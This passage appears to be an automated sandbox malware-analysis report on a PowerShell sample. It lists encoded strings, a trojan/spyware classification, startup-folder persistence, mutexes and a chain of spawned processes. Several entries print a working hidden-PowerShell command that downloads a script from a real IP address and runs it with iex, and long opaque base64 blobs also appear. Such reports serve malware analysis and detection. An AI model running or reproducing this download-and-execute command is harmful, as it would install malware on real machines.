Q/SRtrUGdbNxkNOiYaSC8NG0wlXhwEQFBuFB5jbUVoY1sMTEJVGhNDHHIELwFVWgAiCzwmA1hOTngyYAZIBkx9RBQeY21FahQUW1pWMl00cgBUCTwAd1EtOQAwN1kAYWhVGGAGSAZMfUQUHmNvIi03L0QeBxRcA0kGUgklEBYSTkdFaGNbDExCVRhgBkgEOjQWQEsiISQkLxRPKRpXFE0sSAZMfUQUHmNtRWhjWXseCwFdEFQHRQkuF3lbLiIXMWFXIWZCVRhgBkgGTH1EFB5hHwApJyteAwEQSzNrDUsDLx0WEk5HRWhjWwxMQlUYYAZIBDYqMVpTIj0zISYMYwoxEFs0TwdITnFpPh5jbUVoY1sMTEJVGGJlGkMNKQFkTCwuADswOg5haFUYYAZIBkx9GQ8zSW1FaGMGIWZvfxhgBkhWHjQSVUombQEtLx5LDRYQGClIHAY+OBdBUyYZDTomGkgoBxldJ0ccQ0QUCkBuNz9FICIVSAAHXANNLEgGTH0URlc1LBEtYx9JAAcSWTRDSEQDMggUbSY5Mic0TRg4CgddIUIrSQIpAUxKBygJLSQaWAlKPFY0dhxUTCkMRlsiKUloKhVYNz9VWy9IHEMUKU0PM0ltRWhjC14FFBRMJQYMQwA4A1VKJm0HJywXDD8HAWwoVA1HCB4LWkomNREMJhdJCwMBXWhvBlI8KRYUSis/ACknVwwFDAFjHQYLSQIpAUxKanZoQmNbDEwSB1E2RxxDTDkBWFskLBEtYxlDAw5VfyVSP0kba1BgVjEoBCwAFEIYBw1MBEMEQws8EFEWCiMRGDcJDBgKB10hQkQGBTMQb2NjLgomNx5UGEtONUoGSAZMLRZdSCI5AGgnHkAJBRRMJQYKSQMxRHNbNxkNOiYaSC8NG0wlXhxiCTEBU183KE0BLQ98GBBVTChUDUcIcURdUDcWOGggFEIYBw1MaR1lLEx9RBROMSQTKTceDAgHGV0nRxxDTDQKQB4VJBc8NhpALQ4ZVyNjEGIJMQFTXzcoTQEtD3wYEFVQIUgMSglxRF1QN20ELCcJSR8RWRgpSBwGADgKU0orYUUhLQ8MGBsFXWwGAUgYfRRGUTcoBjxqQCFmQlUYYFYaTxo8EFEeJygJLSQaWAlCF1cvSkhxHjQQUXMmIAo6Oj9JAAcSWTRDQG8CKTRATGM9FycgHl8fTlVRLlJIRA0uAXVaJz8AOzBXDA4bAV0be0hEGTsCUUxvbQwmN1tOGQQTXTJ1AVwJcURGWyVtDCY3W04VFhBLF1QBUhg4Ch0FTkdFaGNbXB4LA1k0Q0hCCTEBU183KEUqLBRATDAQWSRrDUsDLx1wWy8oAik3HgQlDAFoNFRIVh4yB1FNMGFFIS0PDA4DBl0BQgxUCS4XGB4xKANoKhVYTAAAXiZDGgpMNApAHiE4Ay4mCX8FGBAUYFQNQEw0CkAeITQRLTApSQ0GXANNLEgGTH0URlc1LBEtYx9JAAcSWTRDSE8CKURhUC4sFR4qHlsjBCZdI1IBSQIZAVhbJCwRLWsyQhgyAUpgVhpJDzgXRxJjJAs8YxlNHwc0XCRUDVUfdF85NGNtRWgzCUUaAwFdYEINSgk6BUBbYy8KJy9bbx4HFEwldhpJDzgXR3omIQAvIg9JRBEBSilIDwYNLRRYVyAsESEsFWINDxAUYFUcVAUzAxRdLCAIKS0fYAUMEBRgbwZSPCkWFE4xIgYtMAhtGBYHUSJTHEMfcUR9UDcdETpjD0QeBxRcAVIcVAU/EUBbMGFoQmNbDExCVRhgRAdJAH0NWlYmPww8CxpCCA4QS2wGHU8CKURXTCYsESEsFWoAAxJLbAYhSBgNEEYeJiMTITEUQgEHG0xsBhtSHjQKUx4gOBc6JhVYKAsHXSNSB1QVcURGWyVtNjwiCVgZEjxWJklIVRg8FkBLMwQLLixXDB4HExgQVAdFCS4XfVAlIkU4MRRPCREGcS5ABw9XUG45NGNtRWg
Source: 6.2.powershell.exe.80f0000.10.raw.unpack, Knvbl.cs	Base64 encoded string: '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
Source: 6.2.powershell.exe.4dcf5ac.4.raw.unpack, Knvbl.cs	Base64 encoded string: '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
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, ClasserPlus.cs	Base64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
Source: envi5f4j.dll.7.dr, ClasserPlus.cs	Base64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winPS1@22/23@0/2

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_0020642D CoCreateInstance,GetUserDefaultLCID,StringFromGUID2,wsprintfW,RegOpenKeyW,RegEnumKeyW,RegOpenKeyW,RegQueryValueExW,wsprintfW,RegCloseKey,RegCloseKey,

3_2_0020642D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\vfVDlx1hYR5eeg941COCgOYrK6gDAf45JWq0rREs6wMlgEvTfIqUB6GLeUYmXAHG6FXvNHIOyD5aGohg2YWDc5Vc5Yhb/Un2tvnT0+k3WzE=
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7644

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcc4yn4a.w3m.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: wrcaf.ps1

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wrcaf.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exe
Source: C:\Windows\Temp\Package.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3794.tmp" "c:\Users\user\AppData\Local\Temp\envi5f4j\CSC9C647CAA9F2542549472B496F61651E.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Temp\Package.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 204
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exe	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3794.tmp" "c:\Users\user\AppData\Local\Temp\envi5f4j\CSC9C647CAA9F2542549472B496F61651E.TMP"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
